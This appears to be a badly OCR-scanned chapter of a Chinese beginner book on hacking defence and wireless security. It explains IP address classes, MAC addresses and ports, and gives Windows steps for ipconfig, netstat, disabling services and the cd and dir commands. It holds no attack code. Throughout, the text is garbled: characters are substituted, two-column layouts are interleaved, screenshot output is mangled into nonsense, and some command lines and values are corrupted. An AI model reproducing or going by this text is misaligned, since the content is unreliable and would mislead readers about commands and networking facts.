IP 地 址 用 于 在 TCP/IP 通 信 协 议 中 标 
记 每 台 计 算 机 的 地 址 ， 通 常 使 用 十 进 制 
来 表示 ， 如 192.168.1.100， 但 在 计算 机 内 
部 ，IP 地 址 是 一 个 32 位 的 二 进 制 数值 ， 
如 11000000 10101000 00000001 00000110 
(192.168.1.6) 。 

一 个 完整 的 IP 地 址 由 两 部 分 组 成 ， 分 
别 是 网 络 号 和 主机 号 。 网 络 号 表示 其 所 属 
的 网 络 段 编号 ， 主 机 号 则 表示 该 网 段 中 该 
主机 的 地 址 编号 。 

按照 网 络 规模 的 大 小 ，IP 地 址 可 以 分 
为 A、B、C、D、E 五 类 ， 其 中 A、B、C 类 
是 三 种 主要 的 类 型 地 址 ，D 类 专 供 多 目 传 送 
用 的 多 目地 址 ，E 类 用 于 扩展 备用 地 址 。 

e A 类 IP 地 址 。 一 个 A 类 IP 地 址 由 1 

字 节 的 网 络 地 址 和 3 字 节 主机 地 
址 组 成 ， 网 络 地 址 的 最 高 位 必须 
是 “0”， 地 址 范围 从 1.0.0.0 到 


126.0.0.0。 
e B 类 IP 地 址 。 一 个 B 类 IP 地 址 由 2 字 
节 的 网 络 地 址 和 2 字 节 的 主机 地 址 


组 成 ， 网 络 地 址 的 最 高 位 必须 是 
“10”， 地 址 范围 从 128.0.0.0 到 
191.255.255.255。 

e C 类 IP 地 址 。 一 个 C 类 IP 地 址 由 3 字 
节 的 网 络 地 址 和 1 字 节 的 主机 地 址 
组 成 ， 网 络 地 址 的 最 高 位 必须 是 
“110”。 地 址 范围 从 192.0.0.0 到 
223.255.255.255。 

e DD 类 IP 地 址 第 一 个 字 节 以 “1110” 开 
始 ， 它 是 一 个 专门 保留 的 地 址 。 它 
并 不 指 同 特定 的 网 络 ， 目 前 这 一 类 
地 址 被 用 在 多 点 广播 (Multicast) 
中 。 多 点 广播 地 址 用 来 一 次 寻 址 一 


组 计算 机 ， 它 标识 共享 同一 协议 的 
一 组 计算 机 。 
e 下 类 IP 地 址 。 以 “11110” 开 始 ， 为 将 
来 使 用 保留 ， 全 零 (“0.0.0.0”) 
地 址 对 应 于 当前 主机 ; 全 “1” 的 IP 
地 址 (“255.255.255.255”) 是 当 
前 子 网 的 广播 地 址 。 
具体 来 讲 ， 一 个 完整 的 IP 地 址 信息 应 
该 包括 了 地 址 、 子 网 掩 码 、 默 认 网 大 和 DNS 
等 4 部 分 。 只 有 这 4 部 分 协同 工作 ， 才 能 与 
互联 网 中 的 计算 机 相互 访问 。 
e 子 网 掩 码 : 子 网 掩 码 是 与 IP 地 址 结 
合 使 用 的 一 种 技术 。 主 要 作用 有 两 
: 一 是 用 于 确定 IP 地 址 中 的 网 络 
号 和 主机 号 ， 二 是 用 于 将 一 个 大 的 
IP 网 络 划分 为 寿 干 小 的 子 网 络 。 
e 默认 网 关 : 默认 网 关 意 为 一 台 主 机 
如 果 找 不 到 可 用 的 网 天， 就 把 数据 
包 发 送 给 默认 指定 的 网 关 ， 由 这 个 
网 关 来 处 理 数据 包 。 
e DNS: DNS 服 务 用 于 将 用 户 的 域名 
请 求 转 换 为 PP 地 址 。 


2.3.2 ”查看 IP 地 址 


计算 机 的 IP 地 址 一 旦 被 分 配 ， 可 以 说 
是 固定 不 变 的 ， 因 此 ， 查 询 出 无 线 网 络 中 
计算 机 或 终端 设备 的 卫 地 址 ， 在 一 定 程度 上 
就 完成 了 黑客 入 侵 的 前 提 工 作 。 使 用 ipcon- 
fig 命 令 可 以 探知 无 线 网 络 中 计算 机 或 终端 
设备 PP 地址 和 物理 地 址 。 

下 面 以 探知 无 线 网 络 中 计算 机 的 IP 地 
ptr ent 
右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
ry pi ing dette 


搜索 (S$) 


运行 (R) hn 


关机 或 注销 (U) 
点 面 (D) 


一 
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打开 “运行 ”对 话 框 ， 在 “打开 ” 输 
中 输入 cmd 命 令 ， 如 下 图 所 示 。 
ay 
珂 pi eee ottien , 为 你 打开 相应 的 程序 、 
1 Internet 


条 (Oo) 
mm- 


[Step 力 单 去 “确定 ”按钮 ， 打 开 “ 命 令 提示 
符 ” 窗口， 在 “命令 提示 符 ” 窗 口中 输入 
ipconfig， 按 Enter 键 ， 即 可 显示 出 本 机 的 IP 
信息 ， 如 下 图 所 示 。 


{cy 2018 Microsoft Cor rporaticn。 悍 馈 所 有 视 箱 。 
C:\Users\Administrator>ipconfig 
Windows IP 配置 


以 本 网 适配器 SSTAF 1: 


卉 体 状 态 ..........，..: 并 已 
这 才 定 的 DNS 后 缉 . . . . ，. . : Er 和 


以 本 网 过 总 器 人 2: 


永和 : DHCF HDST 
到 Ee se 全 :，fe80::al3c:88al:702e:el8dW5 
. 192 
255 


地 址 。 


2.4 MAC 地址 


MAC 地 址 就 是 在 媒体 接 入 层 上 使 用 
的 地 址 ， 也 叫 物理 地 址 、 硬 件 地 址 或 链 路 
地 址 ， 由 网 络 设备 制造 商 生 产 时 写 在 硬件 
内 部 。 


2.4.1 认识 MAC 地 址 


MAC 地 址 与 网 络 无 关 ， 即 无 论 将 带 涂 
有 这 个 地 址 的 硬件 (如 网 卡 、 和 集线器 、 路 
由 器 等 ) 接 入 到 网 络 的 何 处 ， 都 是 相同 的 
MAC 地 址 ， 它 由 厂商 写 在 网 卡 的 BIOS 里 。 

MAC 地 址 通常 表示 为 12 个 十 六 进 制 
数 ， 每 2 个 十 六 进 制 数 之 间 用 冒号 隔 开 ， 


A 
sr He rp 
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二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


如 : 08:00:20:0A:8C:6D 就 是 一 个 MAC 地 
址 ， 其 中 前 6 位 十 六 进 制 数 08:00:20 代 表 网 
络 硬件 制造 商 的 编号 ， 它 由 IEEE 分 配 ， 而 
后 3 位 十 六 进 制 数 0A:8C:6D 代 表 该 制造 商 所 
制造 的 某 个 网 络 产 品 〈 如 网 卡 ) 的 系列 号 。 

每 个 网 络 制造 商 必 须 确保 它 所 制造 的 
每 个 以 太 网 设备 都 上 共有 相同 的 前 三 个 字 
节 以 及 不 同 的 后 三 个 字 节 。 这 样 ， 就 可 保 


区 全 本 证 世界 上 每 个 以 太 网 设备 都 具有 唯一 的 
要 当 MAC 地 址 。 


( (Rigi 


IP 地 址 与 MAC 地 址 的 区 别 在 于 : IP 
地 址 基于 逻辑 ， 上 比较 灵活 ， 不 受 硬件 限 
制 ， 也 容易 记忆 。MAC 地 址 在 一 定 程度 
上 与 硬件 一 致 ， 基 于 物理 ， 能 够 标识 具 
体 。 这 两 种 地 址 各 有 好 处 ， 使 用 时 也 因 
条 件 而 采取 不 同 的 地 址 。 


pe 如 果 在 “命令 提示 符 ” 窗 口中 输入 ip- 

config /all 命 令 ， 然 后 按 Enter 键 ， 可 以 在 显 
出 的 结果 中 看 到 一 个 物理 地 址 : 6C-0B-84- 
3E-F7-AB， 这 个 就 是 用 户 自己 的 计算 机 的 


网 卡 地 址 ， 它 是 唯一 的 ， 如 下 图 所 示 。 


) 2018 好 crosoft Cort ft 人 
Ci"Users“hdrinistra nf 11 
Nindows IP 本 守 

二 sm SC-201811151232 

DNS 后 给 .-...-...-....: 

所 

IP 吴 有 已 启用 . .,，..,，..,，.: 省 

WINS 和 会 理 己 忆 用 . . .......: 否 

DNS 后 捍 报 索 剂 表 ，。。，。。，。 :DHP HST 


以 本 网 适配器 SSTAP 1: 


媒体 状态 .，，，，，. ，. . ，，; 媒体 已 断 开 连接 
证 革 检 宝 DNS 后 震 . . ， 四 


挤 述 . ，。.。，.。 。 ，。 。，。 。，。: ThP-Vindows Adapter V9 
出 理 地 址 ，，，。。 ，。 。 ，。 。，。 : 00-FF-F6-B0-D8-D4 
He 已 请 用 ,和 理 
自动 配 下 已 启用 . . . - - . . - . . : 十 
以 术 网 适配器 以 太 网 

连 插 特定 的 DNS 后 二 . . ，. . ， .3 DHR HOST 

述 ，，.。，，，，，，。，，，，。: Realtek PCIe 8BE Family Sontroller 
wi 站 本 :0n-25-22-Fo-5F-44 
是 生计 有 ER : 站 

J JFERJIe ee ee ee ee ee § ee 6 是 ® 并 
局 村 IF 地 址 : fe80::al3c:83dl' 了 TDO2e:el8d%5( 自 选 ) 
IPv4 地 址 。，。。，。。，。。，。: 192. 168.0. 143( 首 选 ) 
子 网 扒 到 ,，.， 。1 955. 255, 255.0 
获得 租约 的 加 : 2019 生 1 月 :8 日 量 其 三 上 年 11:48:32 
et : 2019 年 1 月 15 日 时 期 二 下 午 1:48:32 
本 认 了 网 无 。， ; 192.168,0.1 
DHOP 服务 器 ， 二 : 192. 168,0.1 
DHCFwE JIAID ，.。。，。。，.。 。 ，.。 :67118370 
DHCP55 容 己 六 DUID .0-01-00-01-23-TE-AD-03-00-25-22-F9-5F-~44 
DNS 服务 器 ，， . ，, ， ，。: hl1. 128, 114, 166 

61. 128, 11 和 4 13 

ICPIE 上 的 NetBI05 。。，。。，。: 已 自用 


:sers\hdrinistrator’ 
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2.5 什么 是 端口 


计算 机 与 外 界 通信 交流 的 出 口 可 以 认 
为 是 端口 。 一 个 卫 地 址 的 端口 可 以 有 6S5S36 
( 即 256X256) 个 ， 端 口 是 通 过 端口 号 来 
标记 的 ， 端 口号 只 有 整数 ， 范 围 是 从 0 到 
65535 (256X256-1) 。 

2.5.1 ”认识 闪 口 

端口 ， 英 文 是 port。 在 计算 机 领域 中 ， 
端口 可 以 认为 是 计算 机 与 外 界 通信 交流 的 
出 口 。 计 算 机 领域 又 可 分 为 硬件 领域 和 软 
件 领域 ， 在 硬件 领域 中 ， 端 口 又 被 称 作 接 
口 ， 如 常见 的 USB 端 口 、 网 卡 接口 、 串 行 端 
口 等 ， 在 软件 领域 中 ， 端 口 一 般 是 指 网 络 中 
面向 连接 服务 和 无 连接 服务 的 通信 协议 端 
口 ， 是 一 种 抽象 的 软件 结构 ， 包 括 一 些 数据 
结构 和 LO (基本 输入 输出 〉 缓冲 区 。 


局 人 


在 网 络 技术 中 ， 端 口 又 有 好 几 种 意 
思 ， 一 种 是 物理 意义 上 的 端口 ， 如 集 线 
器 、 交 换 机 、 路 由 器 等 连接 设备 用 于 连接 
其 他 的 网 络 设备 的 接口 ， 常 见 的 有 RJ-45 端 
口 、Serial 端 口 等 ; 男 一 种 是 逻辑 意义 上 的 
端口 ， 一 般 指 TCP/IP 协 议 中 的 端口 ， 范 围 
从 0 到 65535 (256X256-1) 。 


2.5.2 查看 系统 的 开放 端口 


经 钊 查看 系统 开放 端口 的 状态 变化 ， 
可 以 帮助 计算 机 用 户 及 时 提高 系统 安全 ， 


防范 黑客 通过 端口 入 侵 计 算 机 ， 用 户 可 以 

使 用 netstat 命 令 查 看 目 己 系统 端口 的 状态 。 
具体 操作 步骤 如 下 。 

打开 “命令 提示 符 ” 窗 口 ， 在 其 中 输 

入 netstat -a-n 命 令 ， 如 下 图 所 示 。 


HR 
(c) 2018 Jicrosott Corporation。 保 留 所 有 权利 。 


:AUsersAdministrator>netstat -a -ne 


按 Enter 键 ， 即 可 看 到 以 数字 显示 的 
a 端口 号 及 其 状态 ， 如 下 图 


不 10. 0. 17763. 104 


icrosoft findows 


(cy 2018 Microsoft Corporaticon。 保留 所 有 权利 。 
C:\Users\Mdministrator>netstat -a -n 
活动 连接 
协议 ”本 地 地 址 外 部 地 址 状态 
TCP D0, 0. 0.0:135 0.0.0,0:0 LISTENING 
TCP 0. 0. 0.0:443 0.D.D.0:0 LISTENING 
TCP 0, 9. D.0 :445 .0 LISTENIING 
TCP 0.0. 0.0:902 0.0.0,0:0 LISTENIING 
TCP 0,0.0.0:912 0.0.0,0:0 LISTENING 
TCP D0, 0. 0.0:3306 0.0.0,0:0 LISTENIIS 
TCP 0D, 0.0.0:5040 0.0.0,0:0 LISTENINS 
TCP 0,0.0.0:5357 0.0.0,0:0 LISTENINS 
TCP D,D.0.0:7909 0.0,.0,0:0 LISTENING 
TCP D.D.0.0:10143 0.0.0.0:0 LISTENING 
TCP 0, 9.0.0:33060 0.0.0,0:0 LISTENIIG 
TCP 0, U, UU. 0 :496p64 0.0.0,0:0 LISTENIING 
TCP 0.0.0.0:49665 0.0.0,0:0 LISTENING 
TCP 0.0.0.0:49666 0.0.0,0:0 LISTENINS 
UDP D0, 0. 0.0:51985 站 ;中 
UDP 0. 0.0.0:51987 站 ,站 
UDP 0,0.0.0:52876 站 ;中 
TDP 0, 0. 0.0:52878 本; 本 
UDP D0.0.0.0:53856 六: 并 
UDP 0. 9.0.0:53857 村 ;水 
UDP 0, V0. VU. 0:54177 六 ;六 
UDP 0, 0. 0.0:58357 六 ;站 
UDP 0.0.0.0:61062 中 :中 
UDP 127.0.0. 1:1900 站 ;站 
UDP 127. 0. 0. 1:52875 本 ;本 
UDP 127.0.0. 1:58359 六 ;并 
UDP 192. 168.0. 143:137 村 ' 亲 
UDP 192. 169. 0. 143:138 冰 ;水 


2.5.3 ”关闭 不 必要 的 端口 


默认 情况 下 ， 计 算 机 系统 中 有 很 多 没 
用 或 不 安全 的 端口 是 开局 的 ， 这 些 端 口 很 
容易 被 黑客 利用 ， 为 保障 系统 的 安全 ， 可 
以 将 这 些 不 用 的 端口 关闭 。 关 闭 端口 的 方 
式 有 多 种 ， 这 里 介绍 通过 关闭 无 用 服务 的 
方式 来 天 闭 不 必要 的 端口 。 

下 面 以 关闭 Remote Desktop Help Ses- 
sion Manager (Windows 远 程 协 助 服务 ) 为 
例 进 行 介绍 ， 有 具体 操作 步骤 如 下 。 
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右 击 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
rhe “控制 面板 ”菜单 命令 ， 如 下 图 
所 示 。 


任务 管理 蓄 (T) 


控制 面板 (P) A 


文件 资源 管理 评 (E) 
搜索 (9) 


运行 (R) 


关机 或 注销 (U) 
桌面 (D) 
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打开 “控制 面板 ”窗口 ， 双 击 “ 管 理 
工具 ”图 标 ， 如 下 图 所 示 。 


国 所有 注 制 面板 项 一 口 x 
小 国 ， 控制 面板 ; 所 有 接 制 面板 项 ， 
文 { 性 (和 杂 凯 [E) ” 吝 夸 (V) 工 呈 (TT 加) 


vu 当 案 控制 画 奈 月 


调 副 计算 机 的 设置 理 儿 方式 大 周 标 ~ 


< 入 BitLocker 驱动 是 加 它 Flash Player 人 Intemet 运 项 
坪 Lenovo 高 消 晰 音频 管理 囊 。 心 Outiook br RemoteApp 和 襟 面 连接 


她 windows Defender 器 > Windows To Go 二 windows 卫 / 
多 安全 和 稚 护 寺 名 和 Rwindows 7 。 靖 程 训 和 功能 
于 不 司 宇 间 (电话 和 讽 利 解 调 正 倪 ss 

因 和 个 性 化 训 工作 文人 夫 ER 
靖 红线 pp | e 唱 宗 后 旬 

< 链 铝 得 哄 程 序 加 狗 扎 记 理 名 


step 图 打开 “管理 工具 ” 窗 
rie te 


口 ， 双 击 “ 服 


一 口 x 
[2 
Y | 叫 | | 深 空 " 竺 理 T 己 亡 
名 咎 修改 所 著 尝 刑 
项 快 过 访问 
弓 iSCSI 发 记 生 序 16-07-16 16 深 方 式 
三 OnaDrive 蜀 0D8C 数控 滨 16-07-15 1 法 方式 
国 此 填 驻 调 Windcws 让 在 认 断 16-0 1 方式 
专 视 卉 而 本 地 去 字 第 略 16-07-16 16 控 方 式 
总 赤 关 消 理 16-( 1 法 方式 
EB 总 打印 管理 16-07-16 16:26 ” 快 瑟 方式 
站 文 村 及 服务 |、 2016-07-16 16:25 。” 快 尘 方式 
量 T 莹 常言 泊 玫 全 Windows 防火 培 2016-07-15 16:25 。” 快 法 方式 
小 关于 者 计 上 车 机 管理 2016-07-16 16:25 ” 居 琵 方式 
Es.] 田 任 芝 计划 程序 16-07-16 16 渤 方 式 
加 Windows10 [加 册 事 伯 查 志 闫 16-07-16 1 尘 方 式 
兆 过 片 至 理 和 优化 亚 动 向 16-( 1 * 汪 方式 
和 加 东 入 加 富 16-07-16 16 独 方 式 
二 和 tb 或 租 (E) 网 | 至 统 信号 16-0 1 深 方 式 
二 本 地 束 大 (FJ 司 性 地 此 视 匡 16-07-16 16:25 ”六 琵 方 式 
完 CD 带动 器 (G) Mcbile Parner 。 乱 深 源 星 机 器 2016-07-16 16:25 ” 快 深 方式 
十 本 地 感 套 (H;) 证 ; 泪 位 服务 16-0 1 法 方式 
蕊 网 阁 
< 》 
17 个 项 目 国 司 


打开 “服务 ”窗口 ， 找 到 Branch 
Cache 服 务 项 ， 如 下 图 所 示 。 
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二 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


这 服务 - ODO Xx BranchCache 的 尾 性 (本 地 计算 机 ) x 
文 余 (F) 探 作 (从 音 夸 (V) 如 动 (H) 
御 中 | 加 | 回回 避 | 旧 区 | Pep 常规 ”登录 ”恢复 ”依存 关系 
BranchCache 名 称 摘 还 状态 人 ^ 服务 全 称 ; PeerDistSvc 
ActiveX Insteller [AdnstSV 为 内 ,。 
启动 风 服 务 Allloyn Router Service 路 证 显示 名 称 ， BranchCache 
HApp Readiness 当时 ,.， 
拱 冰 : 村 Application Identity 礁 十 ,… 
此 展 务 括 存 亲 白 本 施 子 网 上 对 营 方 的 媳 Application Information 使 用 .,。 正在 ,。 撕 述 : 此 服务 各 存 宋 写 本 地 子 网 上 对 等 方 的 网 络 内 容 。 
网 洛 和 内 容 . .application Layer Gatewav Service 为 In.. 
Application Management 为 殖 .. 
以 AppX Depl rt Service [ApPXSVCO) 为 部 _ 
a es Service 僻 帅 .正在 .… 可 执行 文件 的 路 径 : 
SY Background Tasks Infrastructure Service 控制 .。 正在 … C\WINDOWS\System32\svchost.exe -k PeerDist 
Y 
3 Base Filtering Engine 至 二 .。 正 企 , 
3 BitLocker Drive Encryption Service BDE... 启动 类型 (E);: 
本 Block Level Backup Engina Service Win... 
3 Bluetooth Handsiree Service 元 主 .. 
秽 CDPUserSwc 41bb2 “ < 庄 .， 正在 
cenificate propagation 这 再 
Client License Service [ClipSVO) 捏 殿 ,.， 服务 状态 : 
< > 
“扩展 玉 标 准 
ee 启动 (S) 停止 暂停 (p) 恢复 (R) 
当 从 此 处 启动 服务 时 ， 你 可 指定 所 适用 的 启动 参数 。 
双击 Branch Cache 服 务 项 ， 弹 出 
6 » > 本 启动 参数 (M): 
Branch Cache 的 属性 ”对 话 框 ， 在 “局 动 
洲 入 到 、 466 林 39 选 
类 型 ”下 拉 列 表 框 中 选择 “禁用 ”选项 ， 
一 一 
en ee ww | 由 
然后 单 击 “ 确 定 ” 按 钮 ， 禁 用 Branch Cache CC 


服务 项 的 端口 ， 如 下 图 所 示 。 [step 图 单 去 “有 按钮 ， 激活 “启动 ” 按 
BranchCache 的 BH x 钮 ， 如 下 图 所 示 。 


常规 。 登录 ”恢复 。 依存 关系 


BranchCache 的 屋 性 (本 地 计算 机 ) X 

服务 名 称 : PeerDistSvc 
[| BranchCache 常规 痘 录 恢复 依存 关系 
措 述 ; 此 服务 摆 存 率 自 本 地 子 网 上 对 等 方 的 网 络 内 容 。 本 服务 名 称 : PeerDistsvd 

显示 名 称 : BranchCache 
人 ey 此 服务 渗 存 来 富 本 地 子 网 上 对 等 方 约 网 络 内 容 . 
C\WINDOWS\System32\svchost.exe -k PeerDist 
启动 尖 型 (E): 

可 执行 文件 的 路 径 ;: 

CWINDOWS\System32\svchost.exe -k PeerDist 

| [EFE). v 
服务 状 二， 启动 尖 型 (日 ): 主动 
局 动 (S) 停止 (T) 和 暂停 (P) 恢复 (R) 

当 从 此 处 启动 服务 时 ， 你 可 指定 所 适用 的 启动 参数 。 服务 状态 : 已 停止 


| | S m 停 (P) 恢复 (R 
启动 SM 启动 (S) \ 停止 暂停 (P) 复 (R) 


当 从 此 处 启动 服务 时 ， 你 可 指定 所 适用 的 启动 参数 ， 


” | a 


各 2.5.4 局 动 需要 开启 的 端口 ww | 和 


以 ， 下 面具 和 日 动 服务 万 式 开 局 Cache 服 务 ， 再 次 单 击 “应 用 ”按钮 ， 在 


端口 的 具体 操作 步骤 。 “Branch Cache 的 属性 ”对 话 框 中 可 以 看 到 
[seep 回 这 里 以 上 述 关闭 的 Branch Cache 服 务 该 服务 的 “服务 状态 ”已 经 变 为 “正在 运 
端口 为 例 。 在 “Branch Cache 的 属性 ”对 话 行 ” ， 如 下 图 所 示 。 

框 中 单 击 “启动 类 型 ” 右 侧 的 下 拉 按 钮 ， 

在 弹出 的 下 拉 菜 单 中 选择 “自动 ”选项 ， 

如 下 图 所 示 。 
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BranchCache 的 尾 性 (本 地 计算 机 ) Xx 


常规 。 登录 恢复 。 依存 关系 


服务 名 称 ; PeerDistSvd| 
显示 和 名称: BranchCache 
党 述 : 此 服务 笨 存 来 自 本 地 子 网 上 对 等 方 的 网 络 内 容 。 
可 执行 文件 的 路 径 ; 
C\WINDOWS\System32\svchost.exe -k PeerDist 
启动 闪 型 (): 生动 v 
版 务 状态 : 正在 运行 
启动 (S) 停止 (TD) 和 暂停 (P) 恢复 (R) 


当 从 此 处 启动 服务 时 ， 你 可 指定 所 适用 的 启动 参数 。 


| 


单 击 “确定 ”按钮 ， 返 回 到 “服务 ” 

窗 ee 此 时 即 可 发 现 Branch Cache 服 务 
的 “启用 类 型 ”被 设置 为 “正在 运行 ”。 

这 样 就 可 以 成 功 开 启 Branch Cache 服 务 对 应 
的 端口 ， 如 下 图 所 示 。 


局 动 参数 (M): 


二 服气 一 口 xX 
六 御 内 。 授 作 A) ”去 宪 人 V) 各 助 (H) 
钊 中 | 四 | 回 @ 忆 | 日 区 | Pal 


BranchCache 名 称 拓 述 。 凑 去 
.ActiveX Installer [AxlnstsV) 为 从 .… 

已 动 比 给 务 SALoyn Router Service 路 十.… 
App Readiness 兰 昌 ,,， 

描述 : © aApplication Identity 硫 十 … 

比 服 务 深 下 二 目 本 地 子 网 上 对 等 方 的 。 司 ) Application Information 全 四.。 正在 运行 

网 弗 册 室 ， Bl Application Layer Gateway Service 为 In,,， 
Application Management 为 表 . 
AppX Deployment Service [AppXSVO) 为 部 ,,， 
gackground Intelligent Transfer Service 人 已 用. 正在 运行 
加 8ackground Tasks Infrastructure Service 巷 导 |.， 正在 江 行 
gase Filtering Engine 基本 ,,， 正在 运行 
3 BitLocker Drive Encryption Service BDE.. 
.glock Level Backup Engine Service Win,,, 
uetooth Handsfree Service 允许 正在 运行 

[| ne LA [a | 

区 CDPUse erSvc 41bbe < 还 .,， 正在 云 行 
加 certificate Propagation 格 盾 .… 
cient License Service (CliipSYO) 提供 ,， 


法 客 常 用 的 DOS 命 令 


熟练 掌握 一 些 DOS 命 令 是 一 名 黑客 
的 基本 功 ， 下 面 就 来 介绍 一 些 黑客 常用 的 
DOS 命 令 ， 了 解 这 样 命令 可 以 帮助 用 户 
追踪 黑 客 的 踪迹 ， 提 高 个 人 电子 设备 的 
过 全 


2.0 
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2.6.1 cd 命令 


cd (change directory) 命令 的 作用 是 
变 当 前 目录 ， 该 命令 被 用 于 切换 路 径 目录 。 

cd 命令 主要 有 以 下 三 种 使 用 方法 : 

e cd path: path 是 路 径 ， 例 如 输入 cd 
c'\ 命 令 和 cd Windows 命 令 即 可 分 别 
切换 到 Ci\ 和 C:\Windows 目录 下 。 

e cd..: cd 后 面 的 两 个 “.” 表 示 返 回 到 

一 级 目录 ， 例 如 当前 的 目录 为 C:\ 
Windows， 如 果 输 入 cd.. 命 令 ， 按 Enter 
键 即 可 返回 到 上 一 级 目录 ， 即 Ci\。 

e cd\: 表示 当前 无 论 在 哪个 子 级 目 
录 下 ， 通 过 该 命令 立即 返回 到 根 目 
录 下 。 

下 面 将 介绍 使 用 cd 命令 进入 C:\Win- 
dows\system32 子 目录 ， 并 退回 根 目 录 的 具 
ea 
在 “命令 提示 符 ” 窗 口中 输入 cd ci\ 命 
可 按 Enter 键 ， 即 可 将 目录 切换 为 C:\， 如 
下 图 所 示 。 


Lh . 0. i 
(c) 2018 Microsoft Corporation。 和 保留 所 有 权利 。 


:AUsersAAdministrator>cd c:\ 
c: \> 


如 果 想 进入 C:\Windows\system32 目 录 
中 ， 则 需 在 上 图 的 “命令 提示 符 ” 窗 口中 
输入 cd Windows\system32 命 令 ， 按 Enter 键 
即 可 将 目录 切换 为 C:\Windows\system32， 
如 下 图 所 示 。 


Wi crosoft Windows [HR 10. 0. 17763. 104] 
(c) 2018 Jicrosoft Corporation。 保 留 所 有 权利 。 


:AUsersAAdministrator>cd c:\ 


ci:\>cd Windows\system32 


ciAMVWinadowsvSystem32>。 


| 


二 黑客 攻防 与 无 线 妇 全 从 新 手 到 高 手 〈《 超 值 版 ) 


[step 图 如 果 想 返回 到 上 一 级 目录 中 ， 则 可 以 为 以 下 几 种 形式 : 
“命令 提示 符 ” 窗 口中 输入 cd.. 命 令 ， 按 
Enter 键 即 可 返回 到 上 一 级 目录 下 ， 如 下 图 
所 示 。 


/as: 显示 系统 文件 的 信息 。 

/ah: 显示 隐 含 文件 的 信息 。 

/ar: 显示 只 读 文件 的 信息 。 

/aa: 显示 归档 文件 的 信息 。 

(c) 2018 Nicrosoft Corporation。 像 留 所 有 权利 。 /ad: 显示 目录 信息 。 
:MUsersNAdministratorycd c:\ 下 面 将 介绍 在 “命令 提示 符 ” 窗 口中 

c:>cd Windows\system32 使 用 dir 命 令 查看 磁盘 中 的 资 源 的 具体 操作 


c:\Windows\System32>cd .. he 
oo 


c: \Windows>, a 

l 在 “命令 提示 符 ” 窗 口中 输入 dir 命 
ry 按 Enter 键 ， 即 可 查看 当前 目录 下 的 资 
源 列 表 ， 如 下 图 所 示 。 
如 果 想 返回 到 根 目录 ， 则 可 以 在 “ 命 = 和 a 
令 提 示 符 9 窗 口 中 输入 cd 命令 ， 按 Enter 键 er er i 0. 17763. 1D4] 


te) 2018 Nicrosoft Corporation, 悍 记 所 有 想 利 。 


即 可 返回 到 根 目 录 下 ， 如 下 图 所 示 。 Pi peer 
守 乓 主 六 CCDC-C901 
CM\Users\Administrator 的 目录 


| mW .QD. bio oder A 十 01:24 <DIR> 
| 019/017f12/ 周 六 下 午 01:24 <DIRY .. 
(ec) 2018 Microsoft Corporation。 保 留 所 有 权利 。 0197017027 周 三 下 午 02:48 DIR》 .android 
i 3018/11/15/ 周 四 ”下午 02:31 <DIR> .Androidstuaio3.2 
:AUsersAadministrator>cd c:\ 018712705y 周 三 上 午 11:24 <DIR> eclipse 
019701706/ 届 日 “ 午 04:50 <DIRY .gradle 
e 019710]17 157 回 一 上 干 11:48 <DIR» .emptypery 
:\>cd Windows\system32 19/01f10/ 周 四 下 午 02:59 。 <DIR> .p2 
O18 12692/ 国信 不 03:18 DIRY .PyCharm2018. 3 
.WW 0187117157 周 四 下 午 02:33 <DIR> . tooling 
c: \Windows\System32>cd .. 0197017127 周 六 下 午 04:40 。 <DIR> ,VirtualBox 
018/11/15/ 则 办 下 和 12:36 IRY Contacts 
A 018/12/08/ 周 六 下 午 01:38 16, 384 defltbase. jfm 
:Windows>cd \ 018/12/08/ 周 六 下 午 01:38 1, 048, 576 deflthbass. st 
0197017157 周 二 下 午 12:19 DIRY Desktop 
:> 018712714f 周 五 下 午 04:29 。 <DIR》 Documents 
018/12/08/ 周 六 人 下午 01:45 <DIR> Dowmloads 
018/12/08/ 周 六 下 午 D6:12 。 <DIR> Favorites 
0187117157 周 四 ”下午 04:50 55, 429 Senymoticn-Log. Zip 
019y7017097 周 三 ”上午 11:55 12, 238 info. dh 
018/11/30; 周 五 上 午 10:49 33, 974 java_error_in_pycharm 13432.10g 
At EE 下 下 03:09 39, 1 java_error_in studin_ 1456., 1oz 
一 2018/ 137267 同 二 小 干 02:45 36, 962 java_errcr_in studio 2992. 1og 
bet si [a] .6. 2 di D18/11/15/ 午 12:40 <DIRY Lirks 
TH RD 令 018/11/16/ 周 五 上 午 11:02 <IR》 lusic 
1 中 0187127137 上 午 09:42 DIR> OnsDrive 
0181121287 图 愉 下 午 05:17 <DIRY Pictures 
" 0197017127 向 7x 01:24 <DIR» Samsuns Dalaxy Jote - .1.1 - PI 
dir 命 令 的 作用 是 列 出 磁盘 上 所 有 的 或 16 - 800xl280 
全 -于 12:36 <DIRY Saved Games 
» 、 0187117157 下 午 12:36 。 <DIR> Searches 
指 定 的 文件 目 采 》 9] 以 显 修 的 内 容 包含 卷 0187117167 周 五 大 后 11:02 <DIR> Wideos 
1, 242, 014 = 
可 用 字 地 


标 、 文 件 名 、 文 件 大 小 、 文 件 建立 日 期 和 ，、 “人 吾 吕 这 
时 间 、 目 录 名 、 磁 盘 剩 余 空间 等 。 
di 命令 的 格式 如 下 : 在 “命令 提示 符 ” 窗 口中 输入 dir e:/ 
dir [ 盘 符 ] [路 径 ] [文件 名 ] [/p] [/w] [/a: 属 性 ] ye 按 Enter 键 ， 即 可 查 有 E 熏 下 的 所 


文件 的 目录 ， 如 下 图 所 示 。 
其 中 各 个 参数 的 作用 如 下 : ne 
。 p: 当 显 示 的 信息 超过 一 屏 时 暂停 显 。 全 

P 直至 按 任 意 键 才 继 续 显 示 ; P:AUs 各 sa 中 国 下 se >dir c:\Windows /a:h 


人 CCOC- pp 


e /w: 以 横 回 排列 的 形式 显示 文件 名 .ws Ea 


和 目 > 每 和 了 5 个 (不 显 示 文 件 大 tt 全 i . Spe ne 
ML 1 > nstaller 
0187097185/ 周 六 小 午 03:33 <DIR> LanguagEOverlayCache 
d:28 


小 、 建 立 日 期 和 时 间 ) ; A 
e /a (属性 ) : 仅 显 示 指 定 属 性 的 文 :WUeersManinistratar》 

人 在 “命令 提示 符 ” 窗 口 输入 dir 

和 隐 含 文件 外 的 所 有 文件 。 可 指定 cwindows /a:h 命 令 ， 按 Enter 键 即 可 列 出 ci\ 


Ji crosoft Mindows [及 本 10. 0. 17763. 104] 
[<c) 2018 Nicrosoft Coilwiv 但 留 所 有 权 刊 


